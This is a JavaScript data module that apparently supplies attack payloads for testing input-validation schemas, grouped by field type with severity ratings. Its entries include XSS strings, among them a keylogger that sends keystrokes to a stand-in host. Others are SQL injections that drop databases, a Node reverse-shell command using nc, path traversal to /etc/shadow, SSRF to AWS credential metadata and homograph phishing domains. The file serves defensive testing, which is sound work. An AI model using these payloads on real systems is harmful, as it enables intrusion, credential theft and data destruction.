"use strict";
Object.defineProperty(exports, "__esModule", { value: true });
const severity_level_1 = require("../severity-level");
exports.STRING_ATTACKS = {
    COMMON: [
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Basic XSS injection'],
            payload: '<script></script>',
            tags: ['xss', 'basic']
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['JavaScript keylogger through advanced XSS'],
            payload: `<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>`,
            tags: ['xss', 'advanced', 'keylogger']
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['SVG payload XSS injection'],
            payload: '<svgonload=alert(1)>',
            tags: ['xss', 'advanced', 'svg']
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['DIV payload XSS injection'],
            payload: 'Hello<div onpointerout="alert(45)">World</div>',
            tags: ['xss', 'advanced', 'div'],
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Basic SQL injection'],
            payload: '"; DROP ALL DATABASES; --',
            tags: ['sql', 'basic']
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Advanced MySQL injection'],
            payload: `1' ORDER BY 1--+`,
            tags: ['sql', 'mysql', 'advanced']
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Advanced PostgreSQL injection'],
            payload: `';create table persistent (data varchar(200));--`,
            tags: ['sql', 'potgresql', 'advanced']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['NodeJS RCE assuming eval() afterwards'],
            payload: `require("child_process").exec('nc <IP Attacker> 4445 -e /bin/sh')`,
            tags: ['eval', 'rce']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: [`NodeJS RCE assuming eval() afterwards`],
            payload: `something%0Acat%20/etc/passwd`,
            tags: ['eval', 'rce']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: [`XSS bypass attempt for Markdown parsers`],
            payload: `[a](javascript:prompt(document.cookie))`,
            tags: ['xss', 'markdown']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: [`XSS bypass attempt for Markdown parsers`],
            payload: `[a](j a v a s c r i p t:prompt(document.cookie))`,
            tags: ['xss', 'markdown']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: [`XSS bypass attempt for Markdown parsers`],
            payload: `[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)`,
            tags: ['xss', 'markdown']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: [`XSS bypass attempt for Markdown parsers`],
            payload: `[a](javascript:window.onerror=alert;throw%201)`,
            tags: ['xss', 'markdown']
        },
    ],
    PATH_TRAVERSAL: [
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: [`Extracting environment using dedicated process file`],
            payload: '/proc/self/environ',
            tags: ['path-traversal', 'lfi']
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: [`Extracting Linux hashed credentials in shadow file`],
            payload: '../../../../../../etc/shadow',
            tags: ['path-traversal', 'lfi']
        },
        {
            severity: severity_level_1.SeverityLevel.LOW,
            messages: ['XSS attempt through file name'],
            payload: `<svg onload=alert(1)>.png`,
            tags: ['path', 'xss']
        }
    ],
    EMAIL: [
        {
            // This will work on older Joi versions, since RFC compliant
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['RFC-compliant email bypass'],
            payload: '"><svg/onload=confirm(1)>"@domain.com',
        },
        {
            severity: severity_level_1.SeverityLevel.LOW,
            messages: ['Punycode domains may allow homograph phishing attacks'],
            payload: 'bookings@airfrạnce.com',
            tags: ['punycode', 'phishing']
        },
        {
            severity: severity_level_1.SeverityLevel.INFO,
            messages: ['Allowing localhost domains may cause unknown actions'],
            payload: `admin@localhost`,
            tags: []
        }
    ],
    IP: [
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['No IPv4 restriction on localhost may cause SSRF on local services'],
            payload: `127.0.0.1`,
            tags: ['ssrf', 'network']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['No IPv4 restriction on private ranges may cause internal network SSRF'],
            payload: `10.10.124.110`,
            tags: ['ssrf', 'network']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['No IPv4 restriction on private ranges may cause internal network SSRF'],
            payload: `192.168.1.56`,
            tags: ['ssrf', 'network']
        },
        {
            severity: severity_level_1.SeverityLevel.INFO,
            messages: ['Network IPv4 reserved address may cause unknown actions'],
            payload: `0.0.0.0`,
            tags: ['network']
        },
        {
            severity: severity_level_1.SeverityLevel.LOW,
            messages: ['Network IPv4 reserved address may cause unknown actions'],
            payload: `255.255.255.255`,
            tags: ['network', 'broadcast']
        }
    ],
    HOSTNAME: [
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['No local hostname restriction on may cause SSRF'],
            payload: `localhost`,
            tags: ['ssrf']
        },
        {
            severity: severity_level_1.SeverityLevel.LOW,
            messages: ['Punycode domains may allow homograph phishing attacks'],
            payload: 'lidǀ.com',
            tags: ['punycode', 'phishing']
        },
        {
            severity: severity_level_1.SeverityLevel.LOW,
            messages: ['Punycode domains may allow homograph phishing attacks'],
            payload: 'starɓucks.com',
            tags: ['punycode', 'phishing']
        }
    ],
    URI: [
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Joi URI without scheme allows JavaScript inclusion'],
            payload: `javascript:alert('')`
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Fetching UNIX file content on server'],
            payload: 'file:///etc/passwd'
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['Port scan attempt using HTTP scheme with localhost'],
            payload: 'http://127.0.0.1:22',
            tags: ['ssrf']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['Including SVG malicious image'],
            payload: 'http://brutelogic.com.br/poc.svg'
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['SSRF attack on AWS bucket'],
            payload: 'http://instance-data/latest/meta-data/iam/security-credentials/',
            tags: ['ssrf', 'aws']
        },
        {
            severity: severity_level_1.SeverityLevel.LOW,
            messages: ['Reflected XSS in URL parameter'],
            payload: 'https://domain.com/search.html?query=<svg onload=alert(1)>&lang=en',
            tags: ['xss', 'reflected']
        },
        {
            severity: severity_level_1.SeverityLevel.LOW,
            messages: ['Punycode domains may allow homograph phishing attacks'],
            payload: 'https://spaɾ.com/login.html',
            tags: ['punycode', 'phishing']
        },
        {
            severity: severity_level_1.SeverityLevel.LOW,
            messages: ['Punycode domains may allow homograph phishing attacks'],
            payload: 'http://www.googĺe.com/register',
            tags: ['punycode', 'phishing']
        }
    ],
    PHONE: [
        {
            severity: severity_level_1.SeverityLevel.INFO,
            messages: ['Users may submit premium-rate telephone numbers'],
            payload: '090522726',
            tags: ['phone', 'belgium', 'local']
        },
        {
            severity: severity_level_1.SeverityLevel.INFO,
            messages: ['Users may submit premium-rate telephone numbers'],
            payload: '+3290522726',
            tags: ['phone', 'belgium', 'international']
        }
    ]
};
